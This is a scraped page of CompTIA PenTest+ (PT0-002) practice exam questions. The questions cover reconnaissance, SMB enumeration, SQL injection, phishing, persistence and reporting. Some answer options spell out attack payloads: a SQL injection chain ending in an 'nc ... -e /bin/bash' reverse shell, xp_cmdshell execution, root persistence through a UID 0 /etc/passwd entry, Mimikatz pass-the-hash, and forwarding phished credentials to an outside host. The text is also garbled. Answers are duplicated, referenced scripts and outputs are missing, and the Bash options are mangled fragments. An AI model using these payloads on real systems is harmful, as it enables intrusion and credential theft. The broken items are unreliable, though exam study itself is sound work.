Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

The IP address is on the blocklist.

The IP address is on the allow list.

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user's work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

Add a new user with ID 0 to the /etc/passwd file.

Add a web shell to the root of the website.

Upgrade the reverse shell to a true TTY terminal.

Add a new user with ID 0 to the /etc/passwd file.

Change the password of the root user and revert after the test.

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

To reduce the probability of a VM escape attack

To provide protection against host OS vulnerabilities

To reduce the probability of a VM escape attack

To fix any misconfigurations of the hypervisor

To enable all features of the hypervisor

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

Setting up a secret management solution for all items in the source code management system

Developing a secure software development life cycle process for committing code to the source code management system

Setting up a secret management solution for all items in the source code management system

Implementing role-based access control on the source code management system

Configuring multifactor authentication on the source code management system

Leveraging a solution to scan for other similar instances in the source code management system

Developing a secure software development life cycle process for committing code to the source code management system

Creating a trigger that will prevent developers from including passwords in the source code management system

A penetration tester created the following script to use in an engagement: However, the tester is receiving the following error when trying to run the script: Which of the following is the reason for the error?

The sys module was not imported.

The sys variable was not defined.

The argv variable was not defined.

The sys module was not imported.

The argv module was not imported.

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

Job listing and recruitment ads

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

Use Mimikatz to pass the hash and PsExec for persistence.

Use Patator to pass the hash and Responder for persistence.

Use Hashcat to pass the hash and Empire for persistence.

Use a bind shell to pass the hash and WMI for persistence.

Use Mimikatz to pass the hash and PsExec for persistence.

After running the enum4linux.pl command, a penetration tester received the following output: Which of the following commands should the penetration tester run NEXT?

smbclient //192.168.100.56/web -U '' -N

smbspool //192.160.100.56/print$

net rpc share -S 192.168.100.56 -U ''

smbget //192.168.100.56/web -U ''

smbclient //192.168.100.56/web -U '' -N

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:http://company.com/catalog.asp?productid=22The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'Which of the following should the penetration tester attempt NEXT?

http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --

http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'

http://company.com/catalog.asp?productid=22' OR 1=1 --

http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --

http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information: Which of the following lines of code should the security engineer add to make the attack successful?

window.location.= 'https://evilcorp.com'

redirectUrl = 'https://example.com'

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

The web server is behind a load balancer.

The web server is redirecting the requests.

The local antivirus on the web server Is rejecting the connection.

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?

Determine which reports are no longer under a period of confidentiality.

Redact identifying information and provide a previous customer's documentation.

Allow the client to only view the information while in secure spaces.

Determine which reports are no longer under a period of confidentiality.

Provide raw output from penetration testing tools.

Which of the following is the most secure method for sending the penetration test report to the client?

Encrypting the penetration test report with the client's public key and sending it via email.

Sending the penetration test report on an online storage system.

Sending the penetration test report inside a password-protected ZIP file.

Sending the penetration test report via webmail using an HTTPS connection.

Encrypting the penetration test report with the client's public key and sending it via email.

Which of the following factors would a penetration tester most likely consider when testing at a location?

Establish the time of the day when a test can occur.

Determine if visas are required.

Ensure all testers can access all sites.

Verify the tools being used are legal for use at all sites.

Establish the time of the day when a test can occur.

A penetration tester wrote the following Bash script to brute force a local service password:..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

.echo "The correct password is $p" && break)o "The correct password is $p" I break

..echo "The correct password is $p" && break)ho "The correct password is $p" I| break

.echo "The correct password is $p" && break)o "The correct password is $p" I break

echo "The correct password is Sp" && break)echo "The correct password is $p" && break)

.{ echo "The correct password is $p" && break )WithI| ( echo "The correct password is $p" && break )

CompTIA PT0-002 Practice Test 7 - Free Online Exam Prep & Questions

Question 1 / 40

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

Peach

WinDbg

GDB

OllyDbg

Comment (0)

CompTIA PT0-002 Practice Test 7

Question

CompTIA PT0-002 Practice Tests

Practice Tests